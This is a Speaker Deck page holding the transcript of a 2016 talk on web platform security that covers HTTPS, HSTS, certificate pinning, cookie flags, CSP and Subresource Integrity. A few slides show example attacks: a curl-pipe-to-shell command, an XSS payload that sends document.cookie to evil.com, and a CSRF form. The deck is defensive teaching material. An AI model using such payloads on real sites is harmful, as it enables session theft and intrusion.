Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Platform Security

Jérémy Courtial
October 26, 2016
Programming
0
46

Web Platform Security

Jérémy Courtial

October 26, 2016
Tweet

More Decks by Jérémy Courtial

See All by Jérémy Courtial
sudo give the cloud
mrartichaut
0
25
An introduction to AppSec?
mrartichaut
0
43
Secure by design: introduction to threat modeling
mrartichaut
0
51
Taming secrets with Vault
mrartichaut
0
82
Lead Tech: Empowering the team
mrartichaut
0
46
go doSomeThing()
mrartichaut
0
51
Practical Cryptography : Data Encryption
mrartichaut
0
59
Practical Cryptography : Password Hashing
mrartichaut
1
71
HTTP/2 : One connection to rule them all
mrartichaut
1
60

Other Decks in Programming

See All in Programming
PHPでお金を扱う時、終わりのない 謎の1円調査の旅にでなくて済む方法
nakka
4
1.5k
Windows版PHPのビルド手順とPHP 8.4における変更点
matsuo_atsushi
0
400
フロントエンドテストの育て方
quramy
11
2.9k
PHPUnit 高速化テクニック / PHPUnit Speedup Techniques
pinkumohikan
1
1.4k
Firebase Dynamic Linksの代替手段を自作する / Create your own Firebase Dynamic Links alternative
kubode
0
230
安全に倒し切るリリースをするために:15年来レガシーシステムのフルリプレイス挑戦記
sakuraikotone
5
2.7k
生成AIを使ったQAアプリケーションの作成 - ハンズオン補足資料
oracle4engineer
PRO
3
180
リアルタイムレイトレーシング + ニューラルレンダリング簡単紹介 / Real-Time Ray Tracing & Neural Rendering: A Quick Introduction (2025)
shocker_0x15
1
280
Java 24まとめ / Java 24 summary
kishida
3
440
gen_statem - OTP's Unsung Hero
whatyouhide
1
190
Agentic Applications with Symfony
el_stoffel
2
260
CRE Meetup!ユーザー信頼性を支えるエンジニアリング実践例の発表資料です
tmnb
0
620

Featured

See All Featured
4 Signs Your Business is Dying
shpigford
183
22k
Designing for humans not robots
tammielis
252
25k
10 Git Anti Patterns You Should be Aware of
lemiorhan
PRO
656
60k
Building Better People: How to give real-time feedback that sticks.
wjessup
367
19k
Git: the NoSQL Database
bkeepers
PRO
430
65k
Art, The Web, and Tiny UX
lynnandtonic
298
20k
Why Our Code Smells
bkeepers
PRO
336
57k
Unsuck your backbone
ammeep
670
57k
How GitHub (no longer) Works
holman
314
140k
A Tale of Four Properties
chriscoyier
158
23k
The Pragmatic Product Professional
lauravandoore
33
6.5k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
51
2.4k

Transcript

  1. Web Platform Security Leveling up Jérémy Courtial Software Security Architect

  2. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin.

  3. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Rootkit ?

  4. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Malware ?

  5. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Trojan ?

  6. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Browser /ˈbraʊ.zɚ/

  7. http://yolo.com Go!

  8. curl -s http://yolo.com | sh VS http://yolo.com Go!

  9. Browser : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from unknown origin.

  10. Unknown origin

  11. Unknown origin Unsecure

  12. What is anyway ? www.google.com

  13. What is anyway ? www.oodrive.com

  14. What is anyway ? www.lol-cats.com

  15. What is anyway ? 172.217.20.46

  16. Unsecure origin

  17. Unsecure origin

  18. Transport Layer Security

  19. Confidentiality Integrity Authentication

  20. Other incentives "The green lock™"

  21. Other incentives HTTP/2

  22. Other incentives "Secure origins only" features

  23. http https

  24. GET /

  25. GET / 302 Found Location: https://yolo.com

  26. GET / 302 Found Location: https://yolo.com

  27. None
  28. None

  29. 302 Found

  30. 302 Found

  31. 302 Found

  32. HTTP Strict Transport Security

  33. Strict-Transport-Security :

  34. max-age=31536000; Strict-Transport-Security :

  35. includeSubdomains; max-age=31536000; Strict-Transport-Security :

  36. http://yolo.com

  37. http://yolo.com 307 Internal Redirect

  38. https://yolo.com 307 Internal Redirect

  39. 307 Internal Redirect GET / https://yolo.com

  40. Trust failure

  41. TLS certificates are based on trust

  42. Oh… trust … That's cute …

  43. Trust-based systems don't have a good reliability record …

  44. Certificate Authority failures Bad captive portal Every "Internal CA"

  45. You've failed me for the last time

  46. HTTP Certificate Pinning

  47. Public-Key-Pins:

  48. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM=";

  49. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g=";

  50. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

  51. max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

  52. includeSubDomains; max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

  53. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from unknown origin.

  54. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from secured origins.

  55. Unknown code

  56. XSS <h1>Hello, ${username}</h1>

  57. XSS $username = "<img src=evil.com?cookies=" + document.cookie + "/>"

  58. XSS <h1>Hello, <img src="evil.com?cookies =JSESSIONID=5FZ4DS…" /> </h1>

  59. CSRF https://evil.com Click here!

  60. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

  61. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

  62. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

  63. Everybody love cookies !

  64. Rename Cookie to Spinach ?

  65. Rename Cookie to Spinach ? Brussel Sprout ?

  66. REJECTED

  67. Locking the cookie jar

  68. Set-Cookie : JSESSIONID=12345;

  69. Set-Cookie : JSESSIONID=12345; secure;

  70. Set-Cookie : JSESSIONID=12345; secure; HttpOnly;

  71. Set-Cookie : JSESSIONID=12345; sameSite = strict | lax; secure; HttpOnly;

  72. Content Security Policy

  73. Content-Security-Policy

  74. : default-src 'none'; script-src 'self' 'api.google.com'; style-src … ; form-src

    … ; connect-src …; Content-Security-Policy

  75. : … report-uri …; script-src 'strict-dynamic' …; upgrade-insecure-requests; … Content-Security-Policy

  76. Our data (cookies, assets) are locked. What about third parties

    ?

  77. HTML JS JPG

  78. CDN HTML JS JPG JS JPG

  79. CDN HTML JS JPG JS JPG

  80. CDN HTML JS JPG JS JPG

  81. CDN HTML JS JPG JS JPG

  82. Subresource Integrity

  83. <script src="https://example.com/framework.js" > </script>

  84. <script src="https://example.com/framework.js" </script> integrity="sha384-oqVuAfXR….Y8wC">

  85. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from secured origins Browser unknown code

  86. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from secured origins Browser trusted code

  87. Many more Suborigins iframe sandboxing Credentials Management

  88. https://www.w3.org/2011/webappsec/ @mikewest

  89. Times have changed

  90. Times have changed "secured" is the new default secured

  91. What does secured means ? secured Least Privilege Authentication Integrity

  92. Is our platform ? secured

  93. Thank you Icons from Ismael Ruiz, Konstantin Velichko, Rémy Médard,

    unlimicon (The Noun Project) and design.google.com/icons/